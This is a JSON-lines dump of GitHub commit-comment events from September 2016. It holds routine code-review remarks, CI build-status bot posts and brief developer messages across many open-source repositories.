{"id":"4524740888","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921328,"position":null,"line":null,"path":null,"commit_id":"ed1db5db49cace775aae2e9c9e9dce215a282983","created_at":"2016-09-07T00:32:23Z","updated_at":"2016-09-07T00:32:23Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed1db5db49cace775aae2e9c9e9dce215a282983-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed1db5db49cace775aae2e9c9e9dce215a282983-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T00:32:23Z"}
{"id":"4524741491","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921333,"position":2,"line":54,"path":"app/assets/javascripts/application.js","commit_id":"f83ed28fa248e7230ed4b31214ccd0d493f555be","created_at":"2016-09-07T00:32:34Z","updated_at":"2016-09-07T00:32:34Z","body":"css should almost never be applied in javascript. it's hard to maintain and modify."}},"created_at":"2016-09-07T00:32:34Z"}
{"id":"4524742979","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18921338,"position":60,"line":423,"path":"installer/main.py","commit_id":"865747b6ec0af2b00fdce4a7aa8da7e634564080","created_at":"2016-09-07T00:33:00Z","updated_at":"2016-09-07T00:33:00Z","body":"dangling `else` which is now attached to another `if`, but should just be un-elsed"}},"created_at":"2016-09-07T00:33:00Z"}
{"id":"4524743027","type":"CommitCommentEvent","actor":{"login":"jason-pierce-designs"},"repo":{"name":"Stratera/p2prec"},"payload":{"comment":{"id":18921339,"position":113,"line":177,"path":"peerrate-ui/src/app/components/profile/edit/edit.tpl.html","commit_id":"dae7633454b77fda5a83152ae2c368630bf6a8fd","created_at":"2016-09-07T00:33:01Z","updated_at":"2016-09-07T00:33:01Z","body":"It's no big deal for the MVP, but in future releases we would probably want to move the data in these <option> tags to the controller and use an ng-repeat to put them in the template. "}},"created_at":"2016-09-07T00:33:01Z"}
{"id":"4524747372","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":18921347,"position":null,"line":null,"path":null,"commit_id":"d3face7c7b63200ebb66797fe558b6d0d9336b5d","created_at":"2016-09-07T00:34:24Z","updated_at":"2016-09-07T00:34:24Z","body":"There are other methods findOrCreate(): automatically create if not exist, upsert() : update or insert"}},"created_at":"2016-09-07T00:34:24Z"}
{"id":"4524747870","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921348,"position":null,"line":null,"path":null,"commit_id":"cb8e4748fd884ebe543032c48dd5a047044d7d3d","created_at":"2016-09-07T00:34:33Z","updated_at":"2016-09-07T00:34:33Z","body":"check out a presentation i did on front end best practices http://ianmcnally.github.io/best-practices/#/"}},"created_at":"2016-09-07T00:34:33Z"}
{"id":"4524748401","type":"CommitCommentEvent","actor":{"login":"jensensen"},"repo":{"name":"slackero/phpwcms"},"payload":{"comment":{"id":18921350,"position":null,"line":null,"path":null,"commit_id":"a0eb6cf3d28628f7fd6da266538dcd9e31ca5475","created_at":"2016-09-07T00:34:43Z","updated_at":"2016-09-07T00:34:43Z","body":"> do not loop news if there is non\r\nwhat else might happen?\r\n\r\nwhat do you mean with looping news?"}},"created_at":"2016-09-07T00:34:43Z"}
{"id":"4524750635","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18921358,"position":null,"line":null,"path":null,"commit_id":"80887e602c4f49c440f509685948bb0147beb9c9","created_at":"2016-09-07T00:35:25Z","updated_at":"2016-09-07T00:35:25Z","body":"although this is a good alternative. includes a command to delete broken symlinks to mount-FULL, umount-FULL... like 10 invalid symlinks."}},"created_at":"2016-09-07T00:35:25Z"}
{"id":"4524751169","type":"CommitCommentEvent","actor":{"login":"jason-pierce-designs"},"repo":{"name":"Stratera/p2prec"},"payload":{"comment":{"id":18921360,"position":151,"line":215,"path":"peerrate-ui/src/app/components/profile/edit/edit.tpl.html","commit_id":"dae7633454b77fda5a83152ae2c368630bf6a8fd","created_at":"2016-09-07T00:35:36Z","updated_at":"2016-09-07T00:35:36Z","body":"same goes for this too. it's just a lot of markup for a template when it could just be a line or two... but like I said earlier, it's no big deal"}},"created_at":"2016-09-07T00:35:36Z"}
{"id":"4524755093","type":"CommitCommentEvent","actor":{"login":"magp"},"repo":{"name":"ideasmeetings/ideasmeetings.github.io"},"payload":{"comment":{"id":18921367,"position":null,"line":null,"path":null,"commit_id":"bb1aaae2eb02c3a69be8cd51f0c796803108770b","created_at":"2016-09-07T00:36:55Z","updated_at":"2016-09-07T00:36:55Z","body":"Possible issues with Jekyll:\r\n- The headers look strange. Use:\r\n\r\n```text\r\n      ---\r\n           layout: post\r\n           status: publish\r\n           published: true\r\n           title: (meetingDateInTheFormat “Month DD, YYYY”)\r\n           author:\r\n             display_name: (yourName)\r\n             login: (yourGitHubUserName)\r\n             email: (yourEmail)\r\n             url: ‘’\r\n           author_login: (yourGitHubUserName)\r\n           author_email: (yourEmail)\r\n           categories:\r\n            - Vancouver\r\n           tags:\r\n           - Projects\r\n           - Vancouver\r\n           ---\r\n```\r\n\r\n- Spaces in name. Use the name format: \"YYYY-MM-DD-Month-DD-YYYY.md\""}},"created_at":"2016-09-07T00:36:55Z"}
{"id":"4524758724","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921370,"position":null,"line":null,"path":null,"commit_id":"ed1db5db49cace775aae2e9c9e9dce215a282983","created_at":"2016-09-07T00:38:07Z","updated_at":"2016-09-07T00:38:07Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed1db5db49cace775aae2e9c9e9dce215a282983-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T00:38:07Z"}
{"id":"4524758925","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921372,"position":46,"line":39,"path":"sdcclient/_client.py","commit_id":"3716f493fba53cc69a9799c45532ab4b248cf956","created_at":"2016-09-07T00:38:11Z","updated_at":"2016-09-07T00:38:11Z","body":"Totally agree, there doesn't seem to be any rationale for caching this, it's not even frequently used in the code. Feel free to send a PR removing that part or we'll do it very soon."}},"created_at":"2016-09-07T00:38:11Z"}
{"id":"4524761335","type":"CommitCommentEvent","actor":{"login":"ronniebermejo"},"repo":{"name":"kervin5/tiangue"},"payload":{"comment":{"id":18921382,"position":6,"line":21,"path":"app/models/product.rb","commit_id":"2b85e1632cef0926bb51947a6a67a2a25a454fd5","created_at":"2016-09-07T00:38:54Z","updated_at":"2016-09-07T00:38:54Z","body":"👍  nice !\r\n\r\ncomplex stuff should be always encapsulated to isolate its complexity"}},"created_at":"2016-09-07T00:38:54Z"}
{"id":"4524763624","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18921391,"position":null,"line":null,"path":null,"commit_id":"58a07ae6e0e6d048f2862bfd70218bb2caa1b096","created_at":"2016-09-07T00:39:41Z","updated_at":"2016-09-07T00:39:41Z","body":"Thanks for the fixes. I will address any remaining issues, and send you the diff so you know what changed. We should also discuss `pylint` integration in your editor. For instance, the module `warnings`, while used, is not imported in `guess.py`, and these type of things are usually caught by a static code checker."}},"created_at":"2016-09-07T00:39:41Z"}
{"id":"4524765949","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18921399,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T00:40:24Z","updated_at":"2016-09-07T00:40:24Z","body":"Fyi @LorenzMeier \r\n\r\n@dennisss - I have ported crazyflie to nuttx_v3 that uses upstream nuttx and will eventually replace master.\r\n\r\nThe  defconfig has been updated to my best guess for the current upstream nuttx \r\n\r\nWithout a schematic and HW I can not test it. \r\n\r\n"}},"created_at":"2016-09-07T00:40:24Z"}
{"id":"4524766898","type":"CommitCommentEvent","actor":{"login":"matthew-mcallister"},"repo":{"name":"ocf/ocfweb"},"payload":{"comment":{"id":18921402,"position":null,"line":null,"path":null,"commit_id":"3524fee4641e50ac47b88ad6b5f26b1a01d1f7b7","created_at":"2016-09-07T00:40:41Z","updated_at":"2016-09-07T00:40:41Z","body":"It's true, but it contradicts the password reset page."}},"created_at":"2016-09-07T00:40:41Z"}
{"id":"4524768419","type":"CommitCommentEvent","actor":{"login":"JuanMosquera"},"repo":{"name":"JuanMosquera/laboratorio2"},"payload":{"comment":{"id":18921407,"position":null,"line":null,"path":null,"commit_id":"2f33917cf710f56b6021d45819417011ad4394bc","created_at":"2016-09-07T00:41:15Z","updated_at":"2016-09-07T00:41:15Z","body":"a"}},"created_at":"2016-09-07T00:41:15Z"}
{"id":"4524768776","type":"CommitCommentEvent","actor":{"login":"jrochkind"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18921410,"position":4,"line":17,"path":"activerecord/test/models/book.rb","commit_id":"67c1719012506c3387df067961252b5df50a97ce","created_at":"2016-09-07T00:41:20Z","updated_at":"2016-09-07T00:41:20Z","body":"@sgrif interesting. But you added tests for strings? So they obviously work fine. \r\n\r\nWhat would it take to make strings officially supported? A PR request can't really be used to kick it off, cause the functionality is already there. Hm, a PR request for docs? "}},"created_at":"2016-09-07T00:41:20Z"}
{"id":"4524769016","type":"CommitCommentEvent","actor":{"login":"ronniebermejo"},"repo":{"name":"kervin5/tiangue"},"payload":{"comment":{"id":18921411,"position":6,"line":21,"path":"app/models/product.rb","commit_id":"2b85e1632cef0926bb51947a6a67a2a25a454fd5","created_at":"2016-09-07T00:41:26Z","updated_at":"2016-09-07T00:41:26Z","body":"do you have a spec for this `price_in_cents` method /?"}},"created_at":"2016-09-07T00:41:26Z"}
{"id":"4524775938","type":"CommitCommentEvent","actor":{"login":"ronniebermejo"},"repo":{"name":"kervin5/tiangue"},"payload":{"comment":{"id":18921433,"position":90,"line":90,"path":"spec/spec_helper.rb","commit_id":"fb550d193a15eedaa222a12c5a7242bf6d2b93da","created_at":"2016-09-07T00:43:41Z","updated_at":"2016-09-07T00:43:41Z","body":"I usually uncomment this line. specs should not have any execution order dependency."}},"created_at":"2016-09-07T00:43:41Z"}
{"id":"4524777172","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18921437,"position":null,"line":null,"path":null,"commit_id":"41d43c568bc7278c19ac0f177e751c1385295539","created_at":"2016-09-07T00:44:07Z","updated_at":"2016-09-07T00:44:07Z","body":"heroku上で確認しました"}},"created_at":"2016-09-07T00:44:07Z"}
{"id":"4524778938","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"maeda-naho/ToDoList"},"payload":{"comment":{"id":18921441,"position":null,"line":null,"path":null,"commit_id":"451dfaaf3a601410f9b9e1644e3707ff9cce7965","created_at":"2016-09-07T00:44:43Z","updated_at":"2016-09-07T00:44:43Z","body":"heroku上で確認しました！"}},"created_at":"2016-09-07T00:44:43Z"}
{"id":"4524780617","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18921446,"position":null,"line":null,"path":null,"commit_id":"ddbc66a12dfca56e2ed89e49d9eca4a489f831b3","created_at":"2016-09-07T00:45:17Z","updated_at":"2016-09-07T00:45:17Z","body":"heroku上で確認しました！"}},"created_at":"2016-09-07T00:45:17Z"}
{"id":"4524784434","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921453,"position":55,"line":114,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T00:46:39Z","updated_at":"2016-09-07T00:46:39Z","body":"This API seems to have been removed: `[404] Not Found: Not Found`."}},"created_at":"2016-09-07T00:46:39Z"}
{"id":"4524786036","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18921456,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T00:47:14Z","updated_at":"2016-09-07T00:47:14Z","body":"heroku上で確認しました！"}},"created_at":"2016-09-07T00:47:14Z"}
{"id":"4524787515","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"usui-kazuki/ToDoList"},"payload":{"comment":{"id":18921461,"position":null,"line":null,"path":null,"commit_id":"fc50db0f3b1808c0e1bf47477c8920f2b98f13f7","created_at":"2016-09-07T00:47:46Z","updated_at":"2016-09-07T00:47:46Z","body":"heroku上で確認しました！"}},"created_at":"2016-09-07T00:47:46Z"}
{"id":"4524788978","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"satsuma-toshiaki/ToDoList2"},"payload":{"comment":{"id":18921465,"position":null,"line":null,"path":null,"commit_id":"0a8645447fc7eaaf3bb28598429f825a7f9e8d7d","created_at":"2016-09-07T00:48:18Z","updated_at":"2016-09-07T00:48:18Z","body":"heroku上で確認しました！"}},"created_at":"2016-09-07T00:48:18Z"}
{"id":"4524789071","type":"CommitCommentEvent","actor":{"login":"geigerj"},"repo":{"name":"googleapis/artman"},"payload":{"comment":{"id":18921466,"position":6,"line":49,"path":"USAGE.rst","commit_id":"5c4297816ee606bd591009f6cdd07070ac8887c0","created_at":"2016-09-07T00:48:20Z","updated_at":"2016-09-07T00:48:20Z","body":"Why the change to PATH?\r\n\r\n(I would think we should be directing people to install the latest package of packman via npm instead of running it from source.)"}},"created_at":"2016-09-07T00:48:20Z"}
{"id":"4524790096","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18921469,"position":null,"line":null,"path":null,"commit_id":"6e6f1e49f2fa05d0594d8e174d8473e79156d224","created_at":"2016-09-07T00:48:41Z","updated_at":"2016-09-07T00:48:41Z","body":"To PRE."}},"created_at":"2016-09-07T00:48:41Z"}
{"id":"4524790990","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18921472,"position":null,"line":null,"path":null,"commit_id":"8e7feb85a4d9089c0e1c7ab9a3c97e4dfed4f35c","created_at":"2016-09-07T00:49:00Z","updated_at":"2016-09-07T00:49:00Z","body":"**herokuで確認できないよ！！**"}},"created_at":"2016-09-07T00:49:00Z"}
{"id":"4524792689","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"fukuda-nanami/ToDoList"},"payload":{"comment":{"id":18921476,"position":null,"line":null,"path":null,"commit_id":"af94b7e46e77d994dd3b3c7ee718a7172fb55e67","created_at":"2016-09-07T00:49:36Z","updated_at":"2016-09-07T00:49:36Z","body":"**うまく表示されないよ！**"}},"created_at":"2016-09-07T00:49:36Z"}
{"id":"4524793446","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18921479,"position":9,"line":580,"path":"installer/main.py","commit_id":"eb3fad47d2f4f894dbc7dd6a8001ec37b8c2ad83","created_at":"2016-09-07T00:49:52Z","updated_at":"2016-09-07T00:49:52Z","body":"why strip? just worried about newlines or something? (they're handled)"}},"created_at":"2016-09-07T00:49:52Z"}
{"id":"4524794374","type":"CommitCommentEvent","actor":{"login":"yoshimura2016"},"repo":{"name":"fukushiro-sumire/ToDoList"},"payload":{"comment":{"id":18921482,"position":null,"line":null,"path":null,"commit_id":"4877cc8354bde4cd9b87ec9962cef39a5848ca89","created_at":"2016-09-07T00:50:12Z","updated_at":"2016-09-07T00:50:12Z","body":"**うまく表示されないよ！**"}},"created_at":"2016-09-07T00:50:12Z"}
{"id":"4524797911","type":"CommitCommentEvent","actor":{"login":"niujing1"},"repo":{"name":"niujing1/test"},"payload":{"comment":{"id":18921490,"position":null,"line":null,"path":null,"commit_id":"31460ad324e61ed0c0b62710910ec789e32d8a4e","created_at":"2016-09-07T00:51:26Z","updated_at":"2016-09-07T00:51:26Z","body":"212"}},"created_at":"2016-09-07T00:51:26Z"}
{"id":"4524798049","type":"CommitCommentEvent","actor":{"login":"wjdp"},"repo":{"name":"newtheatre/history-project"},"payload":{"comment":{"id":18921491,"position":null,"line":null,"path":null,"commit_id":"e2b5f7768ed0a39bd1c1dfdecbe4361fd0c6000d","created_at":"2016-09-07T00:51:29Z","updated_at":"2016-09-07T00:51:29Z","body":"Will close #360"}},"created_at":"2016-09-07T00:51:29Z"}
{"id":"4524798161","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18921492,"position":null,"line":null,"path":null,"commit_id":"6e6f1e49f2fa05d0594d8e174d8473e79156d224","created_at":"2016-09-07T00:51:31Z","updated_at":"2016-09-07T00:51:31Z","body":"To PRO."}},"created_at":"2016-09-07T00:51:31Z"}
{"id":"4524798904","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"mumuki/mumuki-atheneum"},"payload":{"comment":{"id":18921495,"position":5,"line":1,"path":"app/views/layouts/submissions/editor/_playground_form.html.erb","commit_id":"3bd5b485c9b841cad0053e521e11c015c681c5b7","created_at":"2016-09-07T00:51:47Z","updated_at":"2016-09-07T00:51:47Z","body":"PS: Now I am thinking that the second item has no validation in editor: playgrounds should never be combined with upload or no editor layouts. I will add an issue for that"}},"created_at":"2016-09-07T00:51:47Z"}
{"id":"4524799061","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/drugshistory"},"payload":{"comment":{"id":18921496,"position":54,"line":54,"path":"api/src/main/java/org/openmrs/module/drugshistory/api/impl/DrugsHistoryServiceImpl.java","commit_id":"f423fdad43a7b52ca8552fdf201b11fada2b7328","created_at":"2016-09-07T00:51:51Z","updated_at":"2016-09-07T00:51:51Z","body":"i doubt if this is the way for getting drugs history as well as labs history, each drug order or lab order is having its own concept and probably what you are using here is the concept set where all are contained, if that's the case then looping through observations all through the individual concept members may help. Has it worked for you this way so-far!!!"}},"created_at":"2016-09-07T00:51:51Z"}
{"id":"4524804648","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921513,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-07T00:53:57Z","updated_at":"2016-09-07T00:53:57Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-07T00:53:57Z"}
{"id":"4524805769","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18921517,"position":null,"line":null,"path":null,"commit_id":"8017a638b94398af6497bcd46af66f900c32f388","created_at":"2016-09-07T00:54:22Z","updated_at":"2016-09-07T00:54:22Z","body":"nice."}},"created_at":"2016-09-07T00:54:22Z"}
{"id":"4524808884","type":"CommitCommentEvent","actor":{"login":"mootpointer"},"repo":{"name":"termscorpx/analytics-elixir"},"payload":{"comment":{"id":18921521,"position":null,"line":null,"path":null,"commit_id":"da591e81ce6aeb6372f13e79003aecaa9813e882","created_at":"2016-09-07T00:55:24Z","updated_at":"2016-09-07T00:55:24Z","body":"`~> 0.8` implies `~> 0.9`.\r\n\r\nYou may want to `mix deps.update httpoison` to update the dep in your mix.lock."}},"created_at":"2016-09-07T00:55:24Z"}
{"id":"4524808991","type":"CommitCommentEvent","actor":{"login":"curlette"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18921522,"position":null,"line":null,"path":null,"commit_id":"58a07ae6e0e6d048f2862bfd70218bb2caa1b096","created_at":"2016-09-07T00:55:26Z","updated_at":"2016-09-07T00:55:26Z","body":"I have installed pylint and it is working, so errors like those shouldn't occur in the future."}},"created_at":"2016-09-07T00:55:26Z"}
{"id":"4524813262","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18921535,"position":23,"line":0,"path":"truffle/src/main/ruby/core/enumerable.rb","commit_id":"294d80fb883e765e81de58db666487a9608edf35","created_at":"2016-09-07T00:56:54Z","updated_at":"2016-09-07T00:56:54Z","body":"@eregon Yes, fixed at 38127001fc6ea0566c09b4d65f32cd376b2418cc, thanks!"}},"created_at":"2016-09-07T00:56:54Z"}
{"id":"4524814739","type":"CommitCommentEvent","actor":{"login":"MattPerron"},"repo":{"name":"cmu-db/peloton"},"payload":{"comment":{"id":18921538,"position":null,"line":null,"path":null,"commit_id":"00bda5b8ae6893d515da0263452c1ceb923cc530","created_at":"2016-09-07T00:57:25Z","updated_at":"2016-09-07T00:57:25Z","body":"What was the point of this?\r\n"}},"created_at":"2016-09-07T00:57:25Z"}
{"id":"4524815230","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"mumuki/mumuki-atheneum"},"payload":{"comment":{"id":18921539,"position":5,"line":1,"path":"app/views/layouts/submissions/editor/_playground_form.html.erb","commit_id":"3bd5b485c9b841cad0053e521e11c015c681c5b7","created_at":"2016-09-07T00:57:35Z","updated_at":"2016-09-07T00:57:35Z","body":"Fortunately, this is already validated by atheneum. See playground.rb\r\n\r\n```ruby\r\n  def playable_layout?\r\n    [:editor_bottom, :editor_right].include? layout.to_sym\r\n  end\r\n```"}},"created_at":"2016-09-07T00:57:35Z"}
{"id":"4524819195","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921543,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T00:59:07Z","updated_at":"2016-09-07T00:59:07Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-07T00:59:07Z"}
{"id":"4524821425","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921549,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T00:59:57Z","updated_at":"2016-09-07T00:59:57Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T00:59:57Z"}
{"id":"4524826011","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921558,"position":74,"line":144,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T01:01:21Z","updated_at":"2016-09-07T01:01:21Z","body":"This API seems to have been removed: `[404] Not Found: Not Found`.\r\n\r\n(meh now I already implemented the code for this 😥)"}},"created_at":"2016-09-07T01:01:21Z"}
{"id":"4524828164","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18921562,"position":9,"line":580,"path":"installer/main.py","commit_id":"eb3fad47d2f4f894dbc7dd6a8001ec37b8c2ad83","created_at":"2016-09-07T01:02:03Z","updated_at":"2016-09-07T01:02:03Z","body":"yes, I was just being defensive."}},"created_at":"2016-09-07T01:02:03Z"}
{"id":"4524828290","type":"CommitCommentEvent","actor":{"login":"jcameron"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18921563,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-07T01:02:06Z","updated_at":"2016-09-07T01:02:06Z","body":"Make sure you also change the version in `/etc/webmin/ipfw/config`\r\n"}},"created_at":"2016-09-07T01:02:06Z"}
{"id":"4524832721","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"naturalatlas/node-gdal"},"payload":{"comment":{"id":18921577,"position":null,"line":null,"path":null,"commit_id":"34a67ea89188c95fa1ffcab114cd33e7f938fb48","created_at":"2016-09-07T01:03:36Z","updated_at":"2016-09-07T01:03:36Z","body":"This is failing for the SHARED builds on linux that use older GDAL. Refs https://github.com/naturalatlas/node-gdal/issues/181#issuecomment-245143976"}},"created_at":"2016-09-07T01:03:36Z"}
{"id":"4524832940","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/homework_7"},"payload":{"comment":{"id":18921578,"position":null,"line":null,"path":null,"commit_id":"092159d76c4260b123dafa941e46c73b3c72bc71","created_at":"2016-09-07T01:03:41Z","updated_at":"2016-09-07T01:03:41Z","body":"Generally this is on point, but there are a couple issues with the mobile nav that need to be ironed out. The li elements are not being set to display: block within the media query (it's a problem with selector specificity) and you'll need to undo the width of the nav. Please iron out the couple issues with the nav (and include your javascript spec) and resubmit "}},"created_at":"2016-09-07T01:03:41Z"}
{"id":"4524833461","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18921581,"position":null,"line":null,"path":null,"commit_id":"637299a0460c80860fa639f978fca366509ba00b","created_at":"2016-09-07T01:03:51Z","updated_at":"2016-09-07T01:03:51Z","body":"I hate how Python lets this shit even compile."}},"created_at":"2016-09-07T01:03:51Z"}
{"id":"4524834848","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921588,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T01:04:21Z","updated_at":"2016-09-07T01:04:21Z","body":"This API seems to have been removed: `[404] Not Found: Not Found`."}},"created_at":"2016-09-07T01:04:21Z"}
{"id":"4524835710","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921592,"position":90,"line":174,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T01:04:39Z","updated_at":"2016-09-07T01:04:39Z","body":"Can't work because `get_data_retention_info` is not working."}},"created_at":"2016-09-07T01:04:39Z"}
{"id":"4524838678","type":"CommitCommentEvent","actor":{"login":"baileypa"},"repo":{"name":"baileypa/LocalWeather"},"payload":{"comment":{"id":18921606,"position":5,"line":5,"path":"app.js","commit_id":"7437655a4153d9d025a9162895088b60fb419bdc","created_at":"2016-09-07T01:05:38Z","updated_at":"2016-09-07T01:05:38Z","body":"## adding stuff with ed\r\n\r\n* suptin\r\n* stupin else "}},"created_at":"2016-09-07T01:05:38Z"}
